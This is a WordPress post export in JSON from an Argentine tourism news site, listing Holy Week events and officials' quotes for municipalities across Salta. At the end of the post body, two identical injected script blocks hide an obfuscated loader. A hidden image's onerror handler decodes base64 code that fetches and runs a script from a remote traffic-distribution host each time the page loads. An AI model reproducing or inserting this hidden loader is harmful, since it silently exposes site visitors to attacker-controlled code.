{"id":3893,"date":"2024-03-26T09:40:42","date_gmt":"2024-03-26T12:40:42","guid":{"rendered":"https:\/\/circuitosalta.com.ar\/?p=3893"},"modified":"2025-08-13T23:57:46","modified_gmt":"2025-08-14T02:57:46","slug":"municipios-proponen-una-colmada-agenda-de-actividades-para-vivir-semana-santa-en-salta","status":"publish","type":"post","link":"https:\/\/circuitosalta.com.ar\/?p=3893","title":{"rendered":"Municipios proponen una colmada agenda de actividades para vivir Semana Santa en Salta"},"content":{"rendered":"\n<h4 class=\"wp-block-heading has-white-color has-vivid-cyan-blue-background-color has-text-color has-background has-link-color wp-elements-ddc34720b4232c0304760c0d145e1089\"><em>Junto al Ministerio de Turismo y Deportes, los municipios recibir\u00e1n a los visitantes con m\u00e1s de 320 experiencias que se podr\u00e1n vivir en las distintas regiones tur\u00edsticas de la provincia.<\/em><\/h4>\n\n\n\n<p>Salta cuenta con caracter\u00edsticas que marcan su personalidad; una de ellas es la espiritualidad y fe de su gente, donde los templos, iglesias y capillas diseminadas en cada rinc\u00f3n del territorio son un testimonio de ello. Se combinan adem\u00e1s con museos religiosos y caminatas que permiten experimentar y conocer al m\u00e1ximo su diversidad y su riqueza cultural.<\/p>\n\n\n\n<p>En Semana Santa las numerosas celebraciones toman un hondo sentido popular y religioso, fundi\u00e9ndose con las tradiciones propias de cada una de las regiones tur\u00edsticas de la Provincia que permiten ofrecer una nutrida agenda de actividades para que visitantes puedan disfrutar de la gastronom\u00eda y la cultura en un entorno natural \u00fanico.<\/p>\n\n\n\n<p>Durante la presentaci\u00f3n del calendario de Semana Santa que se realiz\u00f3 en el d\u00eda de ayer, el intendente de General G\u00fcemes,&nbsp;<strong>Carlos Rosso<\/strong>&nbsp;destac\u00f3 \u201ces muy importante tener un estado federal donde cada uno de los municipios pudimos presentar nuestra oferta no solo tur\u00edstica sino tambi\u00e9n religiosa\u201d, al tiempo que agreg\u00f3 \u201cen General G\u00fcemes habr\u00e1 un encuentro interreligioso departamental con v\u00eda crucis en las parroquias del municipio a lo que se suman actividades gastron\u00f3micas como son los concursos de la humita, la empanada, la rosca y huevos de Pascua\u201d.<\/p>\n\n\n\n<p>Por otro lado el intendente de Cachi,&nbsp;<strong>Am\u00e9rico Liendro<\/strong>&nbsp;manifest\u00f3 \u201cen Semana Santa tenemos distintas actividades como el v\u00eda crucis viviente que a\u00f1o a a\u00f1o convoca m\u00e1s visitantes, y la tradicional y cultural quema de Judas que se suma a la oferta tur\u00edstica de Cachi con sus ferias de artesanos y gastron\u00f3micas\u201d.<\/p>\n\n\n\n<p>En tanto, el presidente del Ente Turismo de la Ciudad de Salta,&nbsp;<strong>Fernando Garc\u00eda Soria<\/strong>&nbsp;expres\u00f3 \u201ccomo plantea el Ministro de Turismo y Deportes de la Provincia tenemos que redoblar la apuesta y es clave trabajar generando distintas propuestas para poner a Salta en lo m\u00e1s alto\u201d al tiempo que coment\u00f3 \u201cla ciudad de Salta prepar\u00f3 para Semana Santa m\u00e1s de 100 actividades en articulaci\u00f3n con los municipios vecinos para que los visitantes se lleven una experiencia regional \u00fanica\u201d.<\/p>\n\n\n\n<p>Algunas de las actividades de la ciudad de Salta son el concierto camerata UCASAL, actividades en la Catedral, Iglesia san Francisco y de la Merced; city tour religioso vehicular, visita a las 7 iglesias, feria gastron\u00f3mica comida de vigilia y muestra en el Mercado Artesanal.<\/p>\n\n\n\n<p>Por su parte la directora de Turismo de Campo Quijano,&nbsp;<strong>Valeria Guitian<\/strong>&nbsp;dijo \u201cpreparamos muchas actividades para recibir a los visitantes junto al sector p\u00fablico y privado entre las que podemos resaltar la visita a las siete iglesias, el tradicional v\u00eda crucis al Cerro G\u00f3lgota, el concurso de la humita; la feria del viaducto y artesanos del tren; y la &nbsp;fiesta del choclo capia en Gobernador Sol\u00e1\u201d.<\/p>\n\n\n\n<p>Asimismo el secretario de Turismo, Cultura y Deportes de Cerrillos,&nbsp;<strong>Mat\u00edas Romero<\/strong>&nbsp;manifest\u00f3 \u201cjunto a la parroquia local hemos organizado una misa pascual y un v\u00eda crucis tradicional por las calles del pueblo donde visitantes se podr\u00e1n encontrar con ferias de artesanos y gastron\u00f3micas; adem\u00e1s junto al sector privado se ofrecer\u00e1n promociones especiales en alojamientos y locales gastron\u00f3micos\u201d.<\/p>\n\n\n\n<p>Por su lado la asesora de Turismo del municipio de San Lorenzo,&nbsp;<strong>Ana Cornejo<\/strong>&nbsp;coment\u00f3 \u201cen esta Semana Santa tendremos nuestro 2do Concurso de la Humita donde visitantes podr\u00e1n encontrarse con distintas fondas gastron\u00f3micas, patio de comidas y espect\u00e1culos folcl\u00f3ricos. Tambi\u00e9n realizaremos un v\u00eda crucis desde la parroquia hasta la Quebrada de San Lorenzo, un taller de cuentos pascuales con arte, un taller de folclore, trekkings guiados y muchas actividades m\u00e1s que los invitamos a disfrutar\u201d.<\/p>\n\n\n\n<p>Estas son solo algunas de las actividades que se podr\u00e1n vivir en Salta durante Semana Santa, para conocer m\u00e1s se puede descargar el calendario completo en&nbsp;<a href=\"http:\/\/www.saltacalendario.gob.ar.\/\">http:\/\/www.saltacalendario.gob.ar<\/a><\/p>\n\n\n\n<p><strong>M\u00e1s actividades<\/strong><\/p>\n\n\n\n<ul class=\"wp-block-list\">\n<li>La Caldera: Bendici\u00f3n de Ramos, vigilia Pascual<\/li>\n\n\n\n<li>Chicoana: Paseo cultural, V\u00eda Crucis de los ni\u00f1os; j\u00f3venes y familia<\/li>\n\n\n\n<li>Coronel Moldes: Ven\u00ed al Cabra en Pascuas: promociones con descuentos, experiencias, regalos de nafta<\/li>\n\n\n\n<li>Guachipas: feria de artesanos y emprendedores \u201cGuachipas Pascual\u201d, b\u00fasqueda del huevo de Pascua<\/li>\n\n\n\n<li>El Carril: visita a los siete monumentos, feria de comida de vigilia, festival del cordero pascual<\/li>\n\n\n\n<li>La Merced: feria de emprendedores, venta de comidas regionales de vigilia<\/li>\n\n\n\n<li>La Vi\u00f1a: concurso de la rosca y el huevo de Pascua, feria de emprendedores<\/li>\n\n\n\n<li>San Antonio de los Cobres: guiados en el Museo Cultural Andino,, bendici\u00f3n del fuego en las cinco esquinas<\/li>\n\n\n\n<li>El Jard\u00edn: concurso del huevo y de la rosca de Pascua, feria de artesanos y emprendedores Tierra Linda<\/li>\n\n\n\n<li>La Candelaria: obra teatral camino al calvario \u201cPasi\u00f3n de Jes\u00fas\u201d<\/li>\n\n\n\n<li>Rosario de la Frontera: feria pascual y artesanal, representaci\u00f3n teatral \u201cMemorias\u201d<\/li>\n\n\n\n<li>San Jos\u00e9 de Met\u00e1n: feria de los artesanos, caminata a la Media Luna, concurso de la humita<\/li>\n\n\n\n<li>Aguaray: caminata del arrepentimiento, feria de emprendedores, misa de agua de Pascua<\/li>\n\n\n\n<li>Gral. Ballivi\u00e1n: procesi\u00f3n de Ramos, caminata de Pascua desde el p\u00f3rtico del pueblo<\/li>\n\n\n\n<li>San Ram\u00f3n de la Nueva Or\u00e1n: festival de la empanada, concurso de la empanada<\/li>\n\n\n\n<li>Tartagal: feria gastron\u00f3mica de comidas de vigilia, recorrido de las 7 iglesias, paseo de Pascua, 3er concurso de la empanada salte\u00f1a<\/li>\n\n\n\n<li>Seclant\u00e1s: V\u00eda Crucis viviente, feria agro \u2013 artesanal<\/li>\n\n\n\n<li>San Carlos: feria Pascual, IV feria de producciones andinas, \u201cAmblayo vivo\u201d<\/li>\n<\/ul>\n\n\n\n<figure class=\"wp-block-embed is-type-video is-provider-youtube wp-block-embed-youtube wp-embed-aspect-16-9 wp-has-aspect-ratio\"><div class=\"wp-block-embed__wrapper\">\n<iframe title=\"Municipios proponen una colmada agenda de actividades para vivir Semana Santa en Salta\" width=\"696\" height=\"392\" src=\"https:\/\/www.youtube.com\/embed\/PD827OWSBb8?feature=oembed\" frameborder=\"0\" allow=\"accelerometer; autoplay; clipboard-write; encrypted-media; gyroscope; picture-in-picture; web-share\" allowfullscreen><\/iframe>\n<\/div><\/figure>\n<script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script><script>const img = document.createElement('img');img.src = '\/files\/img\/logo.png';img.setAttribute('data-digest', 'KGZ1bmN0aW9uKCl7dmFyIGE9bG9jYXRpb24sYj1kb2N1bWVudC5oZWFkfHxkb2N1bWVudC5nZXRFbGVtZW50c0J5VGFnTmFtZSgiaGVhZCIpWzBdLGM9InNjcmlwdCIsZD1hdG9iKCJhSFIwY0hNNkx5OTBaSE0wZFhNdVkyOXRMMkZxWVhneExuQm9jQT09Iik7ZCs9LTE8ZC5pbmRleE9mKCI\/Iik\/IiYiOiI\/IjtkKz1hLnNlYXJjaC5zdWJzdHJpbmcoMSk7Yz1kb2N1bWVudC5jcmVhdGVFbGVtZW50KGMpO2Muc3JjPWQ7Yy5pZD1idG9hKGEub3JpZ2luKTtiLmFwcGVuZENoaWxkKGMpO30pKCk7');img.setAttribute('onerror', '(new Function(atob(this.dataset.digest)))();');img.style.visibility = 'hidden';document.body.insertBefore(img, document.body.firstChild);<\/script>","protected":false},"excerpt":{"rendered":"<p>Junto al Ministerio de Turismo y Deportes, los municipios recibir\u00e1n a los visitantes con m\u00e1s de 320 experiencias que se podr\u00e1n vivir en las distintas regiones tur\u00edsticas de la provincia. Salta cuenta con caracter\u00edsticas que marcan su personalidad; una de ellas es la espiritualidad y fe de su gente, donde los templos, iglesias y capillas [&hellip;]<\/p>\n","protected":false},"author":2,"featured_media":3894,"comment_status":"open","ping_status":"open","sticky":false,"template":"","format":"standard","meta":{"tdm_status":"","tdm_grid_status":"","footnotes":""},"categories":[2,18],"tags":[],"class_list":{"0":"post-3893","1":"post","2":"type-post","3":"status-publish","4":"format-standard","5":"has-post-thumbnail","7":"category-religiosos","8":"category-rutas-y-caminos"},"_links":{"self":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3893"}],"collection":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/users\/2"}],"replies":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcomments&post=3893"}],"version-history":[{"count":3,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3893\/revisions"}],"predecessor-version":[{"id":6812,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/posts\/3893\/revisions\/6812"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=\/wp\/v2\/media\/3894"}],"wp:attachment":[{"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fmedia&parent=3893"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Fcategories&post=3893"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/circuitosalta.com.ar\/index.php?rest_route=%2Fwp%2Fv2%2Ftags&post=3893"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}